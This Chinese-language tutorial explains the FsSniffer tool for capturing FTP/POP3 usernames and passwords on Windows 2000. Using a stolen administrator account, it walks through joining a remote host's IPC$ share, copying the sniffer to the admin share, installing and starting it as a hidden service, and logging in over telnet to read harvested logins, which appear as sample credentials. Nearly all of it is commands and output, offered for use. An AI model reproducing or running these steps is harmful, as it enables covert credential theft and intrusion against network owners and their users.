FsSniffer只能在Windows 2000中使用，可以捕捉到本機(jī)和基于非交換環(huán)境局域網(wǎng)的POP3/FTP用戶名和密碼。一、本地使用FSSNIFFER -S <Bind IP> <Port> <Control Password>Bind IP：指綁定的IP地址，通常就是本地主機(jī)IP地址。Port：控制的端口，以后要通過(guò)這個(gè)端口登陸上去查看結(jié)果。Control Password：登陸時(shí)的密碼。登陸上去后的命令Show Result：查看捕獲的記錄Quit：退出ShutDown：結(jié)束Sniffer的運(yùn)行二、遠(yuǎn)程使用例如：得到主機(jī)211.152.188.1的一個(gè)屬于管理員組的帳號(hào)test:test，首先登錄。D:\>net use \\211.152.188.1\ipc$ test /user:testThe command completed successfully.將fssniffer.exe復(fù)制到遠(yuǎn)程主機(jī)。(也可以用流光IV中提供的工具“種植者”來(lái)做這件事情)D:\>copy "d:\My Documents\ShadowSniffer\Release\FsSniffer.exe" \\211.152.188.1\dmin$1 file(s) copied.　利用流光IV中的NTCMD啟動(dòng)FsSniffer.EXE，并將器安裝成為服務(wù)=============Windows NT/2000 NTCmd Ver 0.1 for Fluxay IV============Written by Assassin, http://www.netXeyes.com http://www.netXeyes.orgNTCMD>verMicrosoft Windows 2000 [Version 5.00.2195]NTCMD>fssniffer.exe -I test test ShadowSniffer 211.152.188.1 7 123456 Flux Shadow Sniffer(FTP/POP3) Edition, Written by Assassin 2001TestSniffer1 installed. NTCMD> 這樣在遠(yuǎn)程主機(jī)上面安裝了一個(gè)服務(wù)ShadowSniffer。用net命令啟動(dòng)服務(wù)NTCMD>net start shadowsnifferThe ShadowSniffer service is starting..The ShadowSniffer service was started successfully.安裝成為服務(wù)的格式:FsSniffer -I <Username> <Password> <Service Name> <Bind Local IP> <Port> <Control Password>UserName:遠(yuǎn)程主機(jī)的用戶名（必須具有超級(jí)用戶權(quán)限)Passwod:遠(yuǎn)程主機(jī)的密碼Service Name:安裝的服務(wù)名稱，如果安裝失敗，可以將FsSniffer.exe改名再試。Bind Local IP:遠(yuǎn)程主機(jī)的IP。某些主機(jī)具有兩個(gè)IP地址，這是就需要根據(jù)需要選擇監(jiān)聽(tīng)的IP地址(例如：局域網(wǎng)和外網(wǎng))Port:遠(yuǎn)程控制的端口Control Password:遠(yuǎn)程控制的密碼過(guò)一段時(shí)間就可以登陸到FsSniffer開(kāi)的端口7上面，查看結(jié)果了。D:>telnet 211.152.188.1 7Control Password: **************===============Banyet Soft Labs. 1995-2001 All Rights Reserved.========================Written by Assassin, Server Edition FluxShadow@21cn.com==================FluxShadow Remote FTP/POP3 Sniffer Beta 1, Pleased to See You Again!======Flux Shadow Sniffer>show result===========Flux Shadow Sniffer Edition Results===========211.152.188.112(1106)->211.152.188.1(8213) USER zjf211.152.188.112(1106)->211.152.188.1(8213) PASS 1qaz4rfv211.152.188.1(8213)->211.152.188.112(1106) User zjf logged in.211.152.188.1(8199)->211.152.188.112(1107) USER zjf211.152.188.1(8199)->211.152.188.112(1107) PASS 1qaz4rfvTotal 10 Sniffered======================================================小榕軟件實(shí)驗(yàn)室&#8482; 1995-2001版權(quán)所有www.netXeyes.com www.netXeyes.orgdansnow@21cn.com

最新評(píng)論